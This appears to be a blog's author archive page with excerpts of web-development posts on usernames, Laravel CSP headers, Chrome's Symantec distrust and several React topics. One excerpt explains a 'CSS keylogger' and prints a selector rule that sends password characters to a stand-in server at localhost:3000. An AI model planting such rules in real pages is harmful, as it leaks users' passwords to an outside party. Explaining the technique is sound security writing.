In “Let’s talk about usernames” James Bennett – author of django-registration – digs deeper into an at first seemingly simple thing such as usernames and how to keep ‘m safe and unique. And no, you can’t make it by just doing a a simple comparison. You’ll have to think of more than that if you …
Author Archives: Bramus!
Solo: A Star Wars Story, recut to The Beastie Boys’ Sabotage
Easily set Content Security Policy headers in Laravel with laravel-csp
Speaking of Content Security Policy, the folks at Spatie – who else? – have created a Laravel Package to easily take care or your CSP needs in a Laravel-based app. Even without knowing the inner workings of the packge, the custom Policy below is easy to understand: namespace App\Services\Csp; use Spatie\Csp\Directive; use Spatie\Csp\Policies\Policy as BasePolicy; …
Continue reading “Easily set Content Security Policy headers in Laravel with laravel-csp“
CSS Keylogger (and why you shouldn’t worry about it)
Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory goes that whenever a user presses the a character inside an input[type=”password”], a request to …
Continue reading “CSS Keylogger (and why you shouldn’t worry about it)”
Chrome 66 to Untrust Symantec-issued Certificates
Chrome is really tightening up the security game here. In Chrome 66 it will untrust Symantec-issued SSL/TLS certificates, after Symantec has repeatedly screwed up by wrongly issuing certificates for domains, including google.com itself. Thanks to a decision in September by Google to stop trusting Symantec-issued SSL/TLS certs, from mid-April Chrome browser users visiting websites using …
Continue reading “Chrome 66 to Untrust Symantec-issued Certificates”
React Native and iPhone X: <SafeAreaView />
One of the elements that shipped with React 0.50 is <SafeAreaView />. It’s a component which you can use to prevent your content from creeping below The Notch and Home Indicator on iPhone X. import { // … SafeAreaView } from 'react-native'; class Main extends React.Component { render() { return ( <SafeAreaView style={styles.safeArea}> <App /> …
Continue reading “React Native and iPhone X: <SafeAreaView />“
Proton Native – Create Native Desktop Applications Powered by React
Unlike Electron this one results in true Native Components being outputted. Proton Native does the same to desktop that React Native did to mobile. Build cross-platform apps for the desktop, all while never leaving the React eco-system. Popular React packages such as Redux still work. import React, { Component } from 'react'; import { render, …
Continue reading “Proton Native – Create Native Desktop Applications Powered by React”
React’s new context (React 16.3.0)
One of the new things in React 16.3.0 is a new context API: Typically, data in a React application is passed top-down (parent to child) via props. But sometimes it’s useful to pass values through multiple levels of abstraction without involving each intermediate. Examples include a locale, or a UI theme. Context in React provides …